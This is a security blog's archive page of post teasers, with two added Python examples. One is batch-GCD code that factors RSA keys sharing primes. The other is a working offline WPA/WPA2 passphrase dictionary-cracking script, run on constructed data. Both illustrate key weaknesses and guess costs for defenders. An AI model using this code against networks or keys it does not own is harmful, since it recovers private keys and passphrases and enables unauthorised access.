Clarifying the technical findings on a weakness in RSA crypto keys, and offering recommendations on how to prepare for, and protect your assets from, the next inevitable crypto-weakness discovery.
Continue reading "Ron Was Wrong, Whit Is Right, And What You Need To Know"
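The weakness behind that paper (Lenstra et al., 2012, "Ron was wrong, Whit is right") was that roughly 0.2% of the RSA public keys collected from the Internet shared a prime factor with some other key, because of poor randomness at key-generation time; any two such moduli are factored by a single GCD, which is why the authors, and this post, favour Diffie-Hellman style keys over RSA for such deployments. As an added example (not code from the original post), here is the check a practitioner can run over their own key inventory: Bernstein's batch GCD, which finds every modulus that shares a factor with any other in close to linear time rather than pairwise. The moduli are constructed from small primes so it runs instantly; real keys are 1024 bits and up.

```python
"""Detect RSA moduli that share a prime factor using Bernstein's batch GCD.

Added example, not code from the original page. The primes and moduli
below are constructed; a real scan would load public keys from
certificates, SSH host keys or an HSM inventory."""
from math import gcd


def product_tree(leaves):
    """Return levels [leaves, pairwise products, ..., [product of all]]."""
    tree = [list(leaves)]
    while len(tree[-1]) > 1:
        lvl = tree[-1]
        tree.append([lvl[i] * lvl[i + 1] if i + 1 < len(lvl) else lvl[i]
                     for i in range(0, len(lvl), 2)])
    return tree


def batch_gcd(moduli):
    """For each n_i return gcd(n_i, product of all other moduli).

    Remainder tree: push P = prod(moduli) down the product tree, reducing
    modulo x*x at each node so that the leaf value is P mod n_i**2; then
    (P mod n_i**2) // n_i is congruent to P / n_i modulo n_i."""
    tree = product_tree(moduli)
    rems = tree.pop()                      # top level: [N_1 * ... * N_k]
    while tree:
        lvl = tree.pop()
        rems = [rems[i // 2] % (x * x) for i, x in enumerate(lvl)]
    return [gcd(r // n, n) for r, n in zip(rems, moduli)]


def find_weak_keys(moduli):
    """Map index -> (p, q) for every modulus that shares a factor with another.

    If both primes of n_i are shared with other keys, batch GCD returns n_i
    itself; fall back to pairwise GCD to split it. An exact duplicate modulus
    cannot be split and is reported as None."""
    weak = {}
    for i, g in enumerate(batch_gcd(moduli)):
        n = moduli[i]
        if g == 1:
            continue
        if g == n:
            proper = [gcd(n, m) for j, m in enumerate(moduli) if j != i]
            proper = [c for c in proper if 1 < c < n]
            if not proper:
                weak[i] = None             # duplicate modulus
                continue
            g = proper[0]
        p, q = g, n // g
        weak[i] = (min(p, q), max(p, q))
    return weak


# Constructed key set: N0 shares 1000003 with N2 and 1000033 with N3;
# N1 is the only properly generated key.
MODULI = [
    1000003 * 1000033,
    1000037 * 1000039,
    1000003 * 1000081,
    1000033 * 1000099,
]

if __name__ == "__main__":
    for idx, factors in find_weak_keys(MODULI).items():
        print(f"key {idx}: modulus {MODULI[idx]} factored as {factors}")
```

Run it against every RSA public key you own, including old certificates and embedded-device host keys; a hit means the private key is recoverable by anyone who collected the same public keys.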
The hacker mindset can't be taught -- it must be developed and refined over time
Continue reading "Can You Train A Great Penetration Tester?"
How to pre-emptively secure systems against 0day attacks that, by definition, we know nothing about
Continue reading "Fighting 0days With Fundamentals"
Special care must be taken in a 'zero-knowledge' penetration test, where the tester must first locate the targets.
Continue reading "Pro Pen Testing: The Zero-Knowledge Approach"
Tips for helping family members secure their computers for safe Internet browsing and online shopping.
Continue reading "Thanksgiving IT Help"
Welcome to the first in a series of posts on professional penetration testing. Over the next few entries, I will shed light on the often confusing and rarely straightforward world of penetration testing, based on my experience during the past decade as both a professional penetration tester and a manager of penetration testing teams.
Continue reading "The What And The Why Of Professional Penetration Testing"
During the Labor Day weekend, I got pulled in by friends and relatives (some remotely) to take care of their computer-related problems.
Continue reading "Keep Your Browser Updated"
Adobe has published its security updates for Adobe Reader and Adobe Acrobat.
Continue reading "No PDF Updates Anymore--Anyone Interested?"
A couple of months ago, Secunia's Stefan Frei published a great paper about the patching burden that the average PC user faces every week.
Continue reading "Shed Vulnerabilities With One Simple Rule"
Microsoft published Version 8 of its Security Intelligence Report (SIR) this week. The report covers the second half of 2009 and is a massive document of almost 250 pages.
Continue reading "Microsoft SIR, Dissected"
In the past two weeks we have seen multiple problems with SSL, which is used in our Web browsers to protect the privacy and integrity of our electronic transactions.
Continue reading "In SSL We Trust? Not Lately"
Multiple vulnerabilities in the mainstream browsers and other widely installed software came to light at the CanSecWest conference in Vancouver.
Continue reading "How Safari Hacker Finds Bugs"
Along with the usual security alerts covering the March bulletins from Microsoft and various content management system flaws, US-CERT published an unusual security alert about a product from Energizer, the battery company.
Continue reading "Energizer Bunny Gone Bad"
In the past few weeks since the Google/China incident, we have seen a number of interesting blog posts and white papers that provide further details on some of the techniques used by the attackers.
Continue reading "Boosting Your Defenses Against Botnet Infections"
Microsoft's February 2010 Patch Tuesday was one of the bigger releases for Microsoft and its clients in the past two years -- 13 bulletins addressing 26 vulnerabilities.
Continue reading "Virtualization Vulnerabilities Up And Coming"
The latest update for Internet Explorer is out, and organizations are busy applying or at least certifying the patch on their testbeds.
Continue reading "IE 6 Aftermath: Time To Review Your Browser Strategy"
A co-worker forwarded me an e-mail in which the original sender was asking about running vulnerability scans himself and was concerned that the scans would cause downtime on the servers being tested.
Continue reading "The Inconvenient Truth Behind Security"
Next Tuesday, Jan. 12, is Microsoft Patch Tuesday. Beyond the usual patches from Microsoft, we will also get a critical update for a piece of software that increasingly plays a role in exploiting desktop systems: Adobe Reader.
Continue reading "Adobe Reader's Patch Tuesday"
Microsoft has made Office 2010 available in public beta. After playing around with it for a while, I am not yet sure I need any of the new functionality.
Continue reading "Improved Security In Microsoft Office 2010"
Security reports, most recently the Verizon data breach study, have consistently pointed out weak or default passwords as a major source of data breaches. Now there's a new service that tests the strength of the passwords used to protect wireless access points.
Continue reading "New Cloud-Based Wireless Password Cracker"
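The reason a cloud-based service makes sense here, and the reason a long passphrase still holds up, is the cost of each guess. Assuming the access points use WPA/WPA2 pre-shared keys (the post names the service but not the protocol), every candidate passphrase must be run through PBKDF2-HMAC-SHA1 with 4096 iterations, salted with the SSID, before it can be checked against a captured handshake. The following added example, not code from the original post or from the service it mentions, derives the pairwise master key that way and runs an offline dictionary attack against it; the SSID, the wordlist and the target passphrase are constructed.

```python
"""WPA/WPA2-PSK offline dictionary attack, to show the per-guess cost.

Added example, not code from the original post. In a real attack the
derived PMK is checked against the MIC of a captured 4-way handshake;
here a known PMK stands in for that check. SSID and wordlist are constructed."""
import hashlib
import time


def derive_pmk(ssid: str, passphrase: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).

    The SSID is the salt, so precomputed tables only help for common SSIDs."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def crack_pmk(ssid: str, target_pmk: bytes, wordlist):
    """Return the wordlist entry whose PMK matches target_pmk, or None."""
    for word in wordlist:
        if not 8 <= len(word) <= 63:
            continue                       # cannot be a valid WPA passphrase
        if derive_pmk(ssid, word) == target_pmk:
            return word
    return None


def guesses_per_second(ssid: str = "homenet", samples: int = 200) -> float:
    """Rough single-core throughput, for sizing a dictionary attack."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(ssid, f"candidate{i:04d}")
    return samples / (time.perf_counter() - start)


SSID = "homenet"                                            # constructed
WORDLIST = ["letmein", "password", "iloveyou", "sunshine2009", "Tr0ub4dor&3"]

if __name__ == "__main__":
    target = derive_pmk(SSID, "sunshine2009")               # constructed victim key
    print("recovered passphrase:", crack_pmk(SSID, target, WORDLIST))
    print(f"about {guesses_per_second():.0f} guesses/s on one CPU core")
```

Compare the single-core rate this prints with a wordlist of a few hundred million entries and the arithmetic explains why renting a cluster is the natural next step for an attacker, and why a random passphrase of 20 or more characters stays out of reach.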
Last week saw the launch of Shodan, a search engine for machines (servers, routers, etc.) connected to the Internet.
Continue reading "The Futility Of Security By Obscurity"
Security professionals are intrigued by the fact that in approximately half of the data breach cases Verizon Business works, the victim doesn't realize there's a problem until more than six months after the incident occurred. Another stunning fact: more than two-thirds of the incidents we work are discovered by a third party.
Continue reading "Narrowing The Compromise-To-Discovery Breach Time Line"
I recently attended a presentation about the current state of the Conficker worm, delivered by Felix Leder and Tillmann Werner, two German security researchers from the University of Bonn.
Continue reading "Conficker's Next Move"
This week Microsoft published volume 7 of its Security Intelligence Report (SIR), covering January 2009 through June 2009.
Continue reading "Dissecting Microsoft's Latest Security Intelligence Report"
I recently got back from a sizable IT security conference in London. As I've experienced countless times at shows, everyone was most intrigued by the war stories about organizations that were victims of a data breach. Security folks have an innate desire to learn what happened to others so they can avoid the same fate -- or so they say. However, after personally investigating hundreds of data breaches for my clients, I see a number of recurring themes that nobody seems to catch. One in particular concerns developing and maintaining an incident response plan.
Continue reading "Fundamental Failures With Incident Response Plans"